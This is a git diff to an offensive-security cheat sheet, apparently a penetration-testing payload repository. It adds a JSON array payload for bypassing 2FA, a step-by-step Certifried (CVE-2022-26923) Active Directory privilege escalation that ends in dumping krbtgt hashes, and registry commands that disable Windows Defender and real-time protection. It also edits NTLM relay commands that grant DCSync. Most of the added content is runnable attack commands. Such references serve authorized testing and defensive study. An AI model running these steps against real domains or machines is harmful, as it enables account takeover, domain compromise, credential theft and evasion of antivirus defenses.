diff --git a/Account Takeover/README.md b/Account Takeover/README.md index 23afbe2..5db6c97 100644 --- a/Account Takeover/README.md +++ b/Account Takeover/README.md @@ -28,6 +28,7 @@ * [Clickjacking on 2FA Disabling Page](#clickjacking-on-2fa-disabling-page) * [Enabling 2FA doesn't expire Previously active Sessions](#enabling-2fa-doesnt-expire-previously-active-sessions) * [Bypass 2FA with null or 000000](#bypass-2fa-with-null-or-000000) + * [Bypass 2FA with array](#bypass-2fa-with-array) * [References](#references) ## Password Reset Feature @@ -230,6 +231,22 @@ If the session is already hijacked and there is a session timeout vuln ### Bypass 2FA with null or 000000 Enter the code **000000** or **null** to bypass 2FA protection. +### Bypass 2FA with array + +```json +{ + "otp":[ + "1234", + "1111", + "1337", // GOOD OTP + "2222", + "3333", + "4444", + "5555" + ] +} +``` + ## TODO diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 49ba3a5..0244df0 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -2110,7 +2110,7 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' - Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD ```powershell - TERM1> python printerbug.py testsegment.local/testuser@s2012exc.testsegment.local + TERM1> python printerbug.py testsegment.local/username@s2012exc.testsegment.local TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc ``` @@ -2120,7 +2120,7 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' ```powershell # create a new machine account TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support - TERM2> python printerbug.py relaytest.local/testuser@second-dc-server 10.0.2.6 + TERM2> python printerbug.py relaytest.local/username@second-dc-server 10.0.2.6 TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME # connect using the ticket @@ -2454,6 +2454,46 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 certipy relay -ca 172.16.19.100 ``` +#### Certifried CVE-2022-26923 + +> An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege. + +* Find ms-DS-MachineAccountQuota + ```ps1 + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 getObjectAttributes 'DC=lab,DC=local' ms-DS-MachineAccountQuota + ``` +* Add a new computer in the Active Directory, by default `MachineAccountQuota = 10` + ```ps1 + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 addComputer cve 'CVEPassword1234*' + certipy account create 'lab.local/username:Password123*@dc.lab.local' -user 'cve' -dns 'dc.lab.local' + ``` +* [ALTERNATIVE] If you are `SYSTEM` and the `MachineAccountQuota=0`: Use a ticket for the current machine and reset its SPN + ```ps1 + Rubeus.exe tgtdeleg + export KRB5CCNAME=/tmp/ws02.ccache + python bloodyAD -d lab.local -u 'ws02$' -k --host dc.lab.local setAttribute 'CN=ws02,CN=Computers,DC=lab,DC=local' servicePrincipalName '[]' + ``` +* Set the `dNSHostName` attribute to match the Domain Controller hostname + ```ps1 + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 setAttribute 'CN=cve,CN=Computers,DC=lab,DC=local' dNSHostName '["DC.lab.local"]' + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 getObjectAttributes 'CN=cve,CN=Computers,DC=lab,DC=local' dNSHostName + ``` +* Request a ticket + ```ps1 + # certipy req 'domain.local/cve$:CVEPassword1234*@ADCS_IP' -template Machine -dc-ip DC_IP -ca discovered-CA + certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA + ``` +* Either use the pfx or set a RBCD on your machine account to takeover the domain + ```ps1 + certipy auth -pfx ./dc.pfx -dc-ip 10.10.10.10 + + openssl pkcs12 -in dc.pfx -out dc.pem -nodes + python bloodyAD.py -d lab.local -c ":dc.pem" -u 'cve$' --host 10.10.10.10 setRbcd 'CVE$' 'CRASHDC$' + getST.py -spn LDAP/CRASHDC.lab.local -impersonate Administrator -dc-ip 10.10.10.10 'lab.local/cve$:CVEPassword1234*' + secretsdump.py -user-status -just-dc-ntlm -just-dc-user krbtgt 'lab.local/Administrator@dc.lab.local' -k -no-pass -dc-ip 10.10.10.10 -target-ip 10.10.10.10 + ``` + + ### Dangerous Built-in Groups Usage If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object. @@ -3645,3 +3685,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/) * [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/) * [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/) +* [Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4) +* [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 3027a9e..33352ec 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -115,6 +115,14 @@ MpCmdRun.exe -RemoveDefinitions -All # Remove signatures (if Internet connection is present, they will be downloaded again): PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All + +# Disable Windows Defender Security Center +reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f + +# Disable Real Time Protection +reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f +reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f +reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f ```